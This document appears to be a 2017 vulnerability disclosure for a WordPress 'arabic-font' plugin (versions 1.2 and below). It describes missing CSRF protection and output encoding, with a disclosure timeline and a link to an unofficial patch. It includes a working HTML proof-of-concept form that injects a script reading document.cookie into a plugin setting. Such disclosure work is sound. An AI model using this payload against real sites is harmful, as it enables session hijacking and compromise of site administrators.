Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.

CVSS Score


CVSS Vector


Versions Affected

1.2 and below


There is no official update to resolve this, but an unofficial patch has been included in this disclosure.

Unofficial Patch

The patched plugin can be found here: https://drive.google.com/file/d/1OWUiPZIQPKIc00hMocr6EukOPoHMWsHZ/view?usp=sharing

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">

WordPress Exploit Framework Module




Disclosure Timeline

  • 2017-07-18: Initial discovery
  • 2017-07-18: Contacted vendor with proof of concept and details of the vulnerabilities
  • 2017-07-20: Contacted WordPress to report vulnerability
  • 2017-07-20: Plugin removed from WordPress repository
  • 2017-07-20: Developed an unofficial patch in lieu of the vendor producing one
  • 2017-07-20: Released public disclosure